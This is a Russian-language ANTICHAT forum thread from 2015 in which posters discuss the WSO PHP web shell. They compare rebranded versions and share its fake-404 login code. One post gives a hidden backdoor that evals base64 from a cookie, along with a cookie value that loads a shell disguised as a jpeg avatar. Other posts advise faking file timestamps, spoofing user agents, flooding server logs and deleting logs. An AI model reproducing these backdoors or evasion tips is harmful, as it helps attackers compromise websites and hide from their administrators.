HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Избранное
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #441  
Старый 20.07.2015, 05:24
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Expl0ited  
Expl0ited said:

И что же ты изменил? Испортил дизайн и добавил бесполезную ***ню?
Он ничего не добавил, самое смешное смотреть за историей правок файла. Кстати за основу был взят wso 2.1 этот хакир видимо не знает даже происхождение шелла и что есть 2.5 версия. Во всем виноваты каникулы.

1)

Код:
Code:
-/* WSO 2.1 (Web Shell by oRb) */
+/* WSO 2.2.0 (Web Shell by oRb) */
2)

Код:
Code:
-/* WSO 2.2.0 (Web Shell by oRb) */
+/* WSO 2.2.0 (Web Shell by Pirat) */
3)

Код:
Code:
-/* WSO 2.2.0 (Web Shell by Pirat) */
+/* WSO 2.2.0 (Web Shell by HARD _LINUX) */
4)

Код:
Code:
-$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
+$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
5)

Код:
Code:
-$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
+$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
PS Для чего была вставлена строка?

Цитата:
Сообщение от None  
 
Ответить с цитированием

  #442  
Старый 20.07.2015, 15:04
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от grimnir  
grimnir said:

усвершенствованая функция скрытия
Жмем на 80 ,появляется окно ввода пароля

код
Код:
Code:
function wsoLogin() {
                die("
404 Not Found

Not Found
The requested URL index.php was not found on this server.

Apache/2.2.22 (Linux) Server at Port 80
Password: >'>");
            }
            function WSOsetcookie($k, $v) {
                $_COOKIE[$k] = $v;
                setcookie($k, $v);
            }
            if (!empty($auth_pass)) {
                if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
                if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || ($_COOKIE[md5($_SERVER['HTTP_HOST']) ] != $auth_pass)) wsoLogin();
            }
как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
 
Ответить с цитированием

  #443  
Старый 20.07.2015, 15:17
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
Отличая идея,что-то не подумал сразу.
 
Ответить с цитированием

  #444  
Старый 20.07.2015, 15:40
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668

Репутация: 2054


Отправить сообщение для TANZWUT с помощью ICQ
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
Цитата:
Сообщение от grimnir  
grimnir said:

Отличая идея,что-то не подумал сразу.
И палить шелл GET-ом, а про cookie, user-agent, accept-language и т.п. уже забыли.
__________________
Лучший способ защиты - это нападение!!!
 
Ответить с цитированием

  #445  
Старый 20.07.2015, 18:39
dondy
Guest
Сообщений: n/a
Провел на форуме:
135528

Репутация: 5
По умолчанию

http://kronus.me/cn/wso-builder/1.04/

понравилась онлайн версия билдера wso

возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)

и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!
 
Ответить с цитированием

  #446  
Старый 20.07.2015, 18:42
dondy
Guest
Сообщений: n/a
Провел на форуме:
135528

Репутация: 5
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
можно браузер чекать по useragent - а его рандомно сделать и грузить через useragent switcher + проверка по Ip если потребуется - мне эти способы нравятся, самое хреновое если админ видет что туда обращение идёт через логи

в логах видно что идут запросы, но если сайт крупный и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться, но я удаляю файлы логов
 
Ответить с цитированием

  #447  
Старый 21.07.2015, 00:33
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию

на крупных ресурсах как раз мониторят на фронтах еррор логи от бек эндов, и когда отдается тот же 404 больше шансов что заметят, чем 200 ок
 
Ответить с цитированием

  #448  
Старый 21.07.2015, 01:52
TANZWUT
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668

Репутация: 2054


Отправить сообщение для TANZWUT с помощью ICQ
По умолчанию

Цитата:
Сообщение от dondy  
dondy said:

самое хреновое если админ видет что туда обращение идёт через логи
***
и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться
Зачем столько гемора? Если есть возможность правки, то запрятать в строках примитивный код типа

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]***
[/
COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logout'[/COLOR][COLOR="#007700"]]);
***
if (isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logout'[/COLOR][COLOR="#007700"]]))
{@die(eval([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]));}
[/
COLOR][/COLOR
поправить время через touch, залить jpeg-шелл в аватарки/etc и печеньку подсунуть

Код:
Code:
logout=aW5jbHVkZSgiL2hvbWUvdXNlci93d3cvYXZhdGFycy91c2VyLmpwZyIpOw==
Вариантов много, лиж бы фантазии хватило.
__________________
Лучший способ защиты - это нападение!!!
 
Ответить с цитированием

  #449  
Старый 21.07.2015, 07:36
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от dondy  
dondy said:

http://kronus.me/cn/wso-builder/1.04/
понравилась онлайн версия билдера wso
возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)
и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!
Там же есть описание http://kronus.me/2012/07/wso-builder-v1-04/ и ссылка для скачивания http://kronus.me/wp-content/uploads/...der_v1.042.zip так то любопытный конструктор
 
Ответить с цитированием

  #450  
Старый 22.07.2015, 01:04
dondy
Guest
Сообщений: n/a
Провел на форуме:
135528

Репутация: 5
По умолчанию

а что за файлы в билдере такие с расширением .inc?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета. SK | Heaton Мировые новости. Обсуждения. 5 13.06.2007 02:07
Переделанный шелл! k1b0rg PHP 33 03.04.2007 08:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ